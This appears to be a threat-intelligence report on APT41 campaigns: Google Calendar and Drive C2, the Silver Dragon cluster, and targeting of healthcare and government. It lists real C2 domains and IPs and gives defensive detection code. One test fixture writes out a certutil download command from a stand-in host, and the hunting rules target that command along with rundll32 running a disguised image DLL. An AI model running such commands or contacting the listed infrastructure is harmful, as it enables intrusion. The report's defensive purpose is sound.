APT41's Expanding Arsenal: Google Calendar C2, Silver Dragon, and the Persistent Threat to U.S. Defense and Healthcare
RedSheep Reports | March 16, 2026
APT41 is not slowing down. The Chinese-nexus threat group has spawned a newly identified sub-cluster called Silver Dragon that is actively targeting government entities in Europe and Southeast Asia using Google Drive-based command-and-control [1]. Additionally, Google's threat intelligence team documented APT41 campaigns from late 2024 that deployed TOUGHPROGRESS malware abusing Google Calendar for C2 communications [2]. These developments sit alongside an already extensive history of targeting U.S. healthcare and defense organizations, including the exploitation of USAHERDS zero-day vulnerabilities that compromised at least six U.S. state governments [3][4]. For defenders in defense and healthcare organizations, APT41's operational tempo and technical creativity demand urgent attention.
The group's dual mandate of state-sponsored espionage and financially motivated cybercrime makes it uniquely dangerous. A single intrusion can serve intelligence collection and criminal profit simultaneously. The U.S. Department of Justice unsealed indictments against five Chinese nationals associated with APT41 in September 2020, alleging intrusions against over 100 organizations globally [3]. That legal action did little to slow them down.
APT41: Background and Tracking
APT41 (also tracked as Winnti, Wicked Panda, Barium, and Double Dragon) has been active since at least 2012, targeting healthcare, telecoms, high-tech, education, travel services, and media sectors [1]. The group has conducted targeted campaigns against healthcare organizations in 2014, 2015, 2016, 2018, 2019, and 2020, prompting the HHS Health Sector Cybersecurity Coordination Center (HC3) to issue a specific warning about the threat to healthcare [3].
The group's toolkit is extensive. Known malware families include ShadowPad, Cobalt Strike, PlugX, Gh0st RAT, China Chopper, and Mimikatz [3]. More recently, APT41 has added DodgeBox (a loader with multiple evasion techniques) and MoonWalk (a backdoor using Google Drive for C2) to its arsenal [13]. The group has also deployed UEFI bootkits like MoonBounce for firmware-level persistence [14] and mobile spyware families WyrmSpy and DragonEgg [12].
BlackBerry researchers documented APT41's use of bespoke Cobalt Strike malleable C2 profiles, with infrastructure designed to impersonate legitimate services through typosquatted domains masquerading as Microsoft properties [9].
Silver Dragon: A New Sub-Cluster Emerges
The Silver Dragon cluster is assessed with high confidence to operate within the APT41 umbrella and has been targeting entities in Europe and Southeast Asia since at least mid-2024 [1]. The sub-cluster gains initial access by exploiting public-facing internet servers and delivering phishing emails with malicious attachments [1].
Silver Dragon deploys several custom tools. GearDoor is a .NET backdoor that communicates via Google Drive [1]. SilverScreen is a .NET screen-monitoring tool that captures screenshots from compromised hosts [1]. SSHcmd provides remote command execution through SSH [1]. The cluster also uses BamboLoader, a loader with decryption mechanisms linked to China-nexus APT activity [1].
For persistence and post-exploitation, Silver Dragon relies on Cobalt Strike loaded via DLL sideloading, combined with DNS tunneling for additional C2 redundancy [1]. The diversity of tools and techniques reflects "a well-resourced and adaptable threat group" [1].
TOUGHPROGRESS: Abusing Google Calendar for C2
Google's Threat Intelligence Group discovered APT41 activity in late October 2024 using TOUGHPROGRESS malware hosted on a compromised government website [5]. The attack chain begins with spear-phishing emails containing a ZIP archive (in one case named 出境海關申報清單.zip - Chinese for "Export Customs Declaration List") hosted on an exploited government site [2][5].
The ZIP archive contains a directory with fake arthropod images (1.jpg through 5.jpg) alongside two malicious payloads disguised as 6.jpg and 7.jpg [5]. A malicious LNK file (申報物品清單.pdf.lnk - "Declaration of Items List.pdf.lnk") triggers execution [2]. The attack proceeds through multiple stages:
- PLUSDROP: A DLL that decrypts and executes the next stage in memory [2]
- PLUSINJECT: Performs process hollowing on a legitimate svchost.exe process [2]
- TOUGHPROGRESS: The final payload, which uses the Google Calendar API for C2 [2]
TOUGHPROGRESS begins by using a hardcoded 16-byte XOR key to decrypt embedded shellcode stored in the sample's .pdata region [2]. The malware then communicates with a specific Google Calendar API endpoint to receive commands and exfiltrate data [2]. Google developed custom fingerprints to identify and take down attacker-controlled Calendars [2].
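As an added illustration (not code from the report or from Google's TOUGHPROGRESS analysis), the following Python shows how an analyst decodes a blob protected with a repeating 16-byte XOR key and recovers that key from a known-plaintext prefix, plus a sanity check that catches a wrong key. The key, plaintext and encrypted blob are constructed placeholders; extracting the real blob from a sample's .pdata section is left to a PE parser and is not shown.

```python
# Added example, not from the report or Google's analysis. Key, plaintext and blob
# below are constructed placeholders, not values taken from any TOUGHPROGRESS sample.
from itertools import cycle
from typing import Tuple

KEY_LEN = 16  # the report states a hardcoded 16-byte key


def xor_decrypt(blob: bytes, key: bytes) -> bytes:
    """Undo a repeating-key XOR. XOR is its own inverse, so the same call
    re-encrypts a decrypted buffer."""
    if len(key) != KEY_LEN:
        raise ValueError(f"expected a {KEY_LEN}-byte key, got {len(key)}")
    return bytes(b ^ k for b, k in zip(blob, cycle(key)))


def recover_key(blob: bytes, known_prefix: bytes) -> bytes:
    """Because blob[i] == plain[i] ^ key[i % 16], any 16 consecutive bytes of
    known plaintext (a recognised stub, a PE header, a string the loader is
    known to emit) yield the whole key."""
    if len(known_prefix) < KEY_LEN:
        raise ValueError("need at least one full key period of known plaintext")
    return bytes(c ^ p for c, p in zip(blob[:KEY_LEN], known_prefix[:KEY_LEN]))


def is_degenerate(data: bytes, min_distinct: int = 8) -> bool:
    """Sanity check after decoding: a wrong key typically yields output dominated
    by a handful of byte values (or the key itself repeated), never real code."""
    return len(set(data)) < min_distinct


# Constructed sample (not malware): a readable message stands in for the stage
SAMPLE_KEY = bytes(range(0xA0, 0xA0 + KEY_LEN))
SAMPLE_PLAIN = b"CONSTRUCTED SAMPLE: stand-in for the second stage, not real code"
SAMPLE_BLOB = xor_decrypt(SAMPLE_PLAIN, SAMPLE_KEY)


def demo() -> Tuple[bytes, bytes]:
    """Recover the key from the first 16 known plaintext bytes, then decode."""
    key = recover_key(SAMPLE_BLOB, SAMPLE_PLAIN[:KEY_LEN])
    decoded = xor_decrypt(SAMPLE_BLOB, key)
    if is_degenerate(decoded):
        raise RuntimeError("decoded output looks wrong; check the key")
    return key, decoded


if __name__ == "__main__":
    k, d = demo()
    print(k.hex(), d.decode())
```

The known-plaintext step is the practical one: with a repeating key, the analyst never needs to locate the key constant in the binary if any 16 bytes of the decrypted stage can be predicted.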
This abuse of cloud services for C2 is a deliberate evasion strategy. As Google noted, the technique allows threat actors to "blend in with legitimate activity" [5]. APT41 has used similar approaches with Google Drive (via GearDoor and MoonWalk) [1][13] and Cloudflare Workers [14], making cloud service monitoring a critical defensive requirement.
Healthcare and Defense: Why the Targeting Persists
The healthcare sector remains a priority target for APT41. Medical research data, genomic information, and protected health information all carry intelligence value. APT41 exploited vulnerabilities in networking equipment, cloud software, and IT management tools specifically because of the "over-reliance on the tech for telehealth and telework during the COVID-19 response" [4].
The USAHERDS campaign demonstrated APT41's willingness to exploit niche, sector-specific software. Between May 2021 and February 2022, the group used two zero-day attacks on the USAHERDS livestock management application, exploiting a hard-coded credentials vulnerability (CVE-2021-44207), and compromised at least six U.S. state governments [3][4]. The group simultaneously exploited CVE-2021-44228 (Log4j) during the same campaign [3]. Thirteen organizations were confirmed victims of APT41 in 2021 alone [4].
Healthcare organizations manage sensitive patient data at scale, making them a persistent and lucrative target for state-sponsored cyber espionage. Compromise of healthcare systems could yield sensitive patient records, diagnostic histories, and detailed information about the medical histories of targeted individuals. That intelligence has direct value for profiling and targeting individuals for recruitment, coercion, or extortion.
Zero-Day Exploitation and Speed
APT41 consistently demonstrates the ability to weaponize vulnerabilities faster than most organizations can patch. In March 2020, Darktrace detected APT41 exploiting CVE-2020-10189, a Zoho ManageEngine zero-day, before signatures were available [6]. The attackers downloaded a Go binary named promocioni.php and moved to establish persistence before IT staff could begin patching [6].
Cisco Talos documented APT41 compromising a Taiwanese government-affiliated research institute using ShadowPad and Cobalt Strike, with DLL side-loading through a Bitdefender executable and exploitation of CVE-2018-0824 for privilege escalation [10][11]. The Cobalt Strike loader was written in GoLang with anti-AV capabilities, and contained file path strings in Simplified Chinese [11].
Kaspersky's MDR team detected an APT41 targeted attack against African government IT services, marking a geographic expansion for the group [7]. The attackers used hardcoded names of internal services, IP addresses, and proxy servers in their malware, and established a C2 on a captive SharePoint server within the victim's own infrastructure [7].
IOC Table
| Type | Value | Context | Source |
|---|---|---|---|
| malware | GearDoor | .NET backdoor using Google Drive C2 | [1] |
| malware | SilverScreen | .NET screen capture tool | [1] |
| malware | BamboLoader | Loader linked to China-nexus activity | [1] |
| malware | TOUGHPROGRESS | Final payload using Google Calendar C2 | [2] |
| malware | PLUSDROP | DLL decrypts/executes next stage | [2] |
| malware | PLUSINJECT | Process hollowing on svchost.exe | [2] |
| filename | 出境海關申報清單.zip | Malicious ZIP (Chinese: Export Customs Declaration List) | [2][5] |
| filename | 申報物品清單.pdf.lnk | Malicious LNK (Chinese: Declaration of Items List) | [2] |
| filename | 6.jpg | Encrypted payload disguised as image | [5] |
| filename | 7.jpg | Malicious DLL disguised as image | [5] |
| domain | s3-azure.com | C2 in African government attack | [7] |
| domain | ns1.s3-azure.com | C2 subdomain | [7] |
| domain | ns2.s3-azure.com | C2 subdomain | [7] |
| malware | Pillager | Data stealer used in African campaign | [7] |
| malware | DUSTPAN | Dropper to stealthily load BEACON | [8] |
| malware | ANTSWORD | Web shell for persistence | [8] |
| malware | BLUEBEAM | Web shell for persistence | [8] |
| domain | www.mlcrosoft.site | Typosquatted Microsoft domain | [9] |
| ip | 107.182.24.70 | APT41 C2 infrastructure | [9] |
| ip | 103.96.131.84 | APT41 C2 server | [10] |
| ip | 58.64.204.145 | APT41 C2 server | [10] |
| ip | 103.56.114.69 | ShadowPad C2 server | [10] |
| domain | www.nss.com.tw | Compromised C2 for Cobalt Strike | [11] |
| domain | win10micros0ft.com | WyrmSpy C2 domain | [12] |
| domain | andropwn.xyz | WyrmSpy C2 domain | [12] |
| domain | affice366.com | APT41 related domain | [12] |
| ip | 47.108.173.88 | Alibaba Cloud hosted infrastructure | [12] |
| malware | DodgeBox | Loader with detection evasion | [13] |
| malware | MoonWalk | Backdoor using Google Drive C2 | [13] |
MITRE ATT&CK Mapping
| Technique ID | Name | Context |
|---|---|---|
| T1055.012 | Process Hollowing | PLUSINJECT hollows svchost.exe [2] |
| T1102 | Web Service | Google Calendar, Google Drive, Cloudflare C2 [2][1][8] |
| T1566.002 | Spearphishing Link | ZIP archives on compromised sites [2][5] |
| T1505.003 | Web Shell | ANTSWORD, BLUEBEAM, China Chopper [8][3] |
| T1027 | Obfuscated Files or Information | XOR-encrypted shellcode in .pdata [2] |
| T1140 | Deobfuscate/Decode Files | 16-byte XOR key decryption [2] |
| T1574.002 | DLL Side-Loading | Bitdefender executable abuse [1][11] |
| T1068 | Exploitation for Privilege Escalation | CVE-2018-0824 exploitation [11] |
| T1583.001 | Acquire Infrastructure: Domains | Typosquatted Microsoft domains [9] |
| T1542.001 | System Firmware | MoonBounce UEFI bootkit [14] |
| T1059.003 | Windows Command Shell | certutil.exe abuse, rundll32 execution [8][2] |
Detection and Hunting
Cloud Service C2 Detection: APT41's shift toward abusing Google Calendar, Google Drive, and Cloudflare for C2 means defenders need to monitor API calls to googleapis.com/calendar and googleapis.com/drive endpoints from unexpected processes. Look for svchost.exe or other system processes initiating outbound HTTPS connections to these services. SIEM query example: process_name IN ("svchost.exe", "rundll32.exe") AND dns_query CONTAINS "googleapis.com".
DLL Side-Loading Indicators: Hunt for unknown executables loading DLLs from non-standard directories. Monitor for legitimate signed binaries (particularly Bitdefender executables) loading unexpected DLLs [1][11].
DNS Tunneling: Silver Dragon uses DNS tunneling for C2 redundancy [1]. Monitor for high-volume DNS queries (>1000 queries per minute) to unusual domains, particularly those with encoded or high-entropy subdomain strings. Flag domains matching patterns like s3-azure.com or ns*.s3-azure.com [7].
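The three DNS checks above, as an added example in Python (not part of the report and not any cited vendor's detection content), run over constructed DNS log lines: per-client query rate against the 1000-per-minute figure, mean Shannon entropy of long subdomains per registered domain, and a match on the s3-azure.com pattern. The log format, the entropy cut-off (3.5 bits per character), the minimum subdomain length, the minimum number of distinct subdomains, and the tunnel-example.test domain are assumptions.

```python
# Added example, not from the report. The log format and thresholds other than
# the 1000/minute rate are assumptions; sample lines are constructed.
import hashlib
import math
import re
from collections import Counter, defaultdict
from typing import Dict, List, Tuple

RATE_THRESHOLD = 1000        # queries per client per minute, the report's figure
ENTROPY_THRESHOLD = 3.5      # assumed: mean bits/char above which subdomains look encoded
MIN_SUBDOMAIN_LEN = 20       # assumed: shorter subdomains are not scored for entropy
MIN_UNIQUE_SUBDOMAINS = 50   # assumed: a tunnel produces many distinct subdomains
# Pattern from the report: s3-azure.com and ns*.s3-azure.com [7]
BLOCKLIST = re.compile(r"^(?:ns\d+\.)?s3-azure\.com$")


def shannon_entropy(text: str) -> float:
    """Bits per character: 4.0 is the ceiling for hex labels, higher for
    base32/base64 alphabets, well under 3 for ordinary host names."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def split_name(qname: str) -> Tuple[str, str]:
    """Split 'a.b.example.com' into ('a.b', 'example.com'). Taking the last two
    labels as the registered domain is a simplification; production code should
    consult the Public Suffix List."""
    labels = qname.lower().rstrip(".").split(".")
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def parse_line(line: str) -> Tuple[str, str, str]:
    """Constructed log format: '<ISO-8601 timestamp> <client ip> <queried name>'."""
    ts, client, qname = line.split()
    return ts, client, qname


def analyze(lines: List[str]) -> Dict[str, list]:
    per_minute: Counter = Counter()
    subdomains_by_domain = defaultdict(set)
    blocklist_hits = []
    for line in lines:
        ts, client, qname = parse_line(line)
        per_minute[(client, ts[:16])] += 1          # bucket on YYYY-MM-DDTHH:MM
        sub, domain = split_name(qname)
        if len(sub) >= MIN_SUBDOMAIN_LEN:
            subdomains_by_domain[domain].add(sub)
        if BLOCKLIST.match(qname.lower()):
            blocklist_hits.append(qname)
    high_rate = [(client, minute, n) for (client, minute), n in per_minute.items()
                 if n > RATE_THRESHOLD]
    high_entropy = []
    for domain, subs in subdomains_by_domain.items():
        if len(subs) < MIN_UNIQUE_SUBDOMAINS:
            continue
        mean_entropy = sum(shannon_entropy(s) for s in subs) / len(subs)
        if mean_entropy > ENTROPY_THRESHOLD:
            high_entropy.append(domain)
    return {"high_rate": high_rate, "high_entropy": high_entropy, "blocklist": blocklist_hits}


def constructed_sample() -> List[str]:
    """Constructed DNS log: normal traffic, a tunnel-like burst, one blocklist hit."""
    lines = [f"2026-03-16T10:00:{i:02d}Z 10.0.0.7 calendar.google.com" for i in range(20)]
    for i in range(1200):   # 1200 distinct encoded labels inside a single minute
        label = hashlib.sha256(f"chunk-{i}".encode()).hexdigest()[:60]
        lines.append(f"2026-03-16T10:00:{i % 60:02d}Z 10.0.0.5 {label}.tunnel-example.test")
    lines.append("2026-03-16T10:01:00Z 10.0.0.9 ns1.s3-azure.com")
    return lines


if __name__ == "__main__":
    for kind, hits in analyze(constructed_sample()).items():
        print(kind, hits[:3])
```

Scoring entropy per registered domain rather than per query keeps a single odd-looking CDN host name from paging anyone; a tunnel shows up as many distinct, uniformly high-entropy subdomains under one parent.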
Process Hollowing: PLUSINJECT creates hollowed svchost.exe processes [2]. Hunt for svchost.exe instances spawned by non-standard parent processes or running from unusual file paths.
Typosquatted Domains: APT41 consistently registers domains that mimic legitimate services. Block and alert on connections to domains like mlcrosoft.site, win10micros0ft.com, and affice366.com [9][12]. Implement fuzzy-match domain monitoring for your organization's key vendor names.
Web Shell Activity: Watch for certutil.exe being called to download binaries, a technique documented in APT41's DUSTTRAP campaigns [8]. Query: process_name="certutil.exe" AND command_line CONTAINS "-urlcache".
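The endpoint-side hunts in this section (non-browser processes reaching the Calendar and Drive APIs, svchost.exe with the wrong parent or path, certutil.exe with -urlcache, rundll32.exe executing .jpg files, and fuzzy matching on vendor names) expressed as Python predicates and run over constructed endpoint telemetry. This is an added example, not code from the report or from any SIEM or EDR product; the event schema, the browser list, the vendor token list and the host downloader.example are assumptions, while the lookalike domains come from the report's IOC table.

```python
# Added example, not from the report or any vendor product. Event fields and
# non-IOC host names are constructed; the lookalike domains are the report's IOCs.
import re
from collections import defaultdict
from typing import Dict, List, Optional

BROWSERS = {"chrome.exe", "firefox.exe", "msedge.exe", "edge.exe"}
CLOUD_API_HOSTS = {"www.googleapis.com", "googleapis.com"}
CLOUD_API_PATHS = ("/calendar/", "/drive/")
VENDOR_TOKENS = ("microsoft", "office365", "google")   # brands to fuzzy-match
SVCHOST_PARENTS = {"services.exe"}   # simplification: tune to your own baseline
SVCHOST_PATH = r"c:\windows\system32\svchost.exe"


def levenshtein(a: str, b: str) -> int:
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def typosquat_distance(host: str) -> Optional[int]:
    """Smallest edit distance (1 or 2) between any label, or any label window of
    token length, and a vendor token. An exact substring match (distance 0) is
    the brand spelled correctly and is not treated as a lookalike."""
    best = None
    for label in host.lower().split("."):
        for token in VENDOR_TOKENS:
            n = len(token)
            windows = [label] if len(label) <= n else [label[i:i + n] for i in range(len(label) - n + 1)]
            d = min(levenshtein(w, token) for w in windows)
            if 1 <= d <= 2 and (best is None or d < best):
                best = d
    return best


def rule_cloud_c2_nonbrowser(e: Dict[str, str]) -> bool:
    return (e["dest"] in CLOUD_API_HOSTS and any(p in e["url"] for p in CLOUD_API_PATHS)
            and e["process"].lower() not in BROWSERS)


def rule_svchost_lineage(e: Dict[str, str]) -> bool:
    if e["process"].lower() != "svchost.exe":
        return False
    return e["parent"].lower() not in SVCHOST_PARENTS or e["path"].lower() != SVCHOST_PATH


def rule_certutil_urlcache(e: Dict[str, str]) -> bool:
    return e["process"].lower() == "certutil.exe" and "-urlcache" in e["cmdline"].lower()


def rule_rundll32_image_ext(e: Dict[str, str]) -> bool:
    return (e["process"].lower() == "rundll32.exe"
            and re.search(r"\.(?:jpg|jpeg|png)\b", e["cmdline"], re.I) is not None)


def rule_typosquat(e: Dict[str, str]) -> bool:
    return bool(e["dest"]) and typosquat_distance(e["dest"]) is not None


RULES = {
    "cloud_c2_nonbrowser": rule_cloud_c2_nonbrowser,
    "svchost_lineage": rule_svchost_lineage,
    "certutil_urlcache": rule_certutil_urlcache,
    "rundll32_image_ext": rule_rundll32_image_ext,
    "typosquat": rule_typosquat,
}


def evaluate(events: List[Dict[str, str]]) -> Dict[str, List[int]]:
    """Map each rule name to the indexes of the events that trigger it."""
    hits: Dict[str, List[int]] = {name: [] for name in RULES}
    for i, e in enumerate(events):
        for name, fn in RULES.items():
            if fn(e):
                hits[name].append(i)
    return hits


# Constructed telemetry: one field set per process/network event
EVENTS: List[Dict[str, str]] = [
    {"process": "chrome.exe", "parent": "explorer.exe", "path": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": "chrome.exe", "dest": "www.googleapis.com", "url": "https://www.googleapis.com/calendar/v3/users/me/calendarList"},
    {"process": "svchost.exe", "parent": "cmd.exe", "path": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs", "dest": "www.googleapis.com", "url": "https://www.googleapis.com/calendar/v3/calendars/primary/events"},
    {"process": "svchost.exe", "parent": "services.exe", "path": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs", "dest": "", "url": ""},
    {"process": "certutil.exe", "parent": "cmd.exe", "path": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -f https://downloader.example/file.bin file.bin", "dest": "downloader.example", "url": "https://downloader.example/file.bin"},
    {"process": "rundll32.exe", "parent": "explorer.exe", "path": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\user\AppData\Local\Temp\7.jpg,#1", "dest": "", "url": ""},
    {"process": "outlook.exe", "parent": "explorer.exe", "path": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "cmdline": "outlook.exe", "dest": "www.mlcrosoft.site", "url": "https://www.mlcrosoft.site/"},
    {"process": "chrome.exe", "parent": "explorer.exe", "path": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": "chrome.exe", "dest": "www.microsoft.com", "url": "https://www.microsoft.com/"},
]

if __name__ == "__main__":
    for name, idx in evaluate(EVENTS).items():
        print(f"{name}: {idx}")
```

Note the window trick in typosquat_distance: comparing a long label such as win10micros0ft against token-length windows is what lets a brand buried inside a longer label match, while the distance-0 exclusion keeps www.microsoft.com and www.googleapis.com off the list. The url field is needed for the Calendar and Drive path check because, as the checklist below also notes, DNS data carries only the host name.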
Analysis
APT41's operational patterns over the past two years reveal three significant shifts. First, the group is systematically migrating C2 infrastructure to legitimate cloud services. Google Calendar, Google Drive, Cloudflare Workers, and SharePoint have all been weaponized for C2 communications [2][1][7][14]. This complicates network-based detection because blocking these services entirely is impractical for most organizations.
Second, the emergence of Silver Dragon as a distinct sub-cluster suggests APT41 is compartmentalizing operations, likely to maintain operational security and reduce the blast radius of any single exposure [1]. This mirrors organizational patterns seen in other Chinese APT ecosystems.
Third, the group continues to target niche, sector-specific software (like USAHERDS) alongside broadly deployed platforms (like Log4j and Zoho ManageEngine) [3][4][6]. This dual approach means both generic vulnerability management programs and sector-specific application security reviews are necessary.
For healthcare and defense organizations, the convergence of APT41's espionage mandate with its technical capabilities presents a serious and ongoing threat. The group has demonstrated it will target the specific software stacks used in government health programs. DHA and TRICARE systems, with their combination of health data and military personnel information, represent a high-value target set.
Red Sheep Assessment
Confidence: Moderate
The sources collectively point to a conclusion none of them state directly: APT41's aggressive adoption of legitimate cloud services for C2 is not just an evasion technique but a strategic decision to create diplomatic friction around takedown operations. Disrupting APT41's Google Calendar or Google Drive C2 infrastructure requires cooperation from U.S. technology companies, but the group can reconstitute that infrastructure rapidly because these services are free and easy to provision. Google's development of custom fingerprints to identify attacker-controlled Calendars [2] is a significant defensive measure, but it's reactive by nature.
The Silver Dragon sub-cluster's focus on European and Southeast Asian governments [1], combined with the African government targeting documented by Kaspersky [7], suggests APT41 is deliberately expanding geographic scope. This likely serves both intelligence collection objectives and provides cover for operations. When a group operates globally, any single country's attribution and response efforts capture only a fragment of the picture.
A contrarian reading: APT41's proliferation of sub-clusters and tool families could indicate organizational pressure to produce results rather than strategic sophistication. The sheer volume of custom malware (TOUGHPROGRESS, GearDoor, DodgeBox, MoonWalk, Pillager, DUSTPAN, and many more) requires significant development resources. This breadth could reflect redundancy planning, or it could reflect a lack of centralized coordination, with competing teams within the APT41 umbrella pursuing parallel objectives.
Regardless of internal dynamics, the practical threat to U.S. defense and healthcare organizations is substantial and growing. APT41's ability to exploit zero-days within narrow windows [6], target sector-specific applications [4], and abuse trusted cloud platforms for C2 [2] makes it one of the most capable adversaries these sectors face.
Defender's Checklist
- [ ] Monitor outbound API calls to googleapis.com/calendar/v3 and googleapis.com/drive from non-browser processes. Query: process_name NOT IN ("chrome.exe","firefox.exe","edge.exe") AND dns_query CONTAINS "googleapis.com/calendar" (a DNS query carries only the host name; the /calendar path is visible only in proxy or TLS-inspection logs)
- [ ] Hunt for DLL side-loading activity by auditing unsigned DLLs loaded by Bitdefender executables, and rundll32.exe executing .jpg files. Sysmon Event ID 7 is your friend here.
- [ ] Block known APT41 C2 domains including s3-azure.com, mlcrosoft.site, win10micros0ft.com, andropwn.xyz, affice366.com at the DNS and proxy level [6][7][9][12]
- [ ] Review public-facing applications for unpatched vulnerabilities, especially sector-specific software like USAHERDS (CVE-2021-44207) and any Zoho ManageEngine instances. APT41 exploits these within days of disclosure [3][6].
- [ ] Deploy process hollowing detection by monitoring for svchost.exe instances with unexpected parent processes or anomalous memory regions. Tools like Elastic's Sysmon integration or CrowdStrike's process lineage tracking can flag PLUSINJECT-style activity [2].
References
- APT41-Linked Silver Dragon Targets Governments Using Cobalt Strike and Google Drive C2
- Mark Your Calendar: APT41 Innovative Tactics
- Healthcare Industry Warned About Risk Posed by APT41 Threat Group
- APT41 spear-phishing, supply chain campaigns target pharma, healthcare
- Chinese APT41 Exploits Google Calendar for Malware Command-and-Control Operations
- How AI Caught APT41 Exploiting Vulnerabilities
- SOC files: an APT41 attack on government IT services in Africa
- APT41 Has Arisen From the DUST
- Drawing a Dragon: Connecting the Dots to Find APT41
- Cisco Talos APT41 IOCs
- APT41 likely compromised Taiwanese government-affiliated research institute with ShadowPad and Cobalt Strike
- Finding WyrmSpy and DragonEgg Ties to APT41 in the DNS
- DodgeBox: Deep Dive Into Updated Arsenal of APT41
- APT41 Cyberespionage and Cybercrime Group: 2025 Global Analysis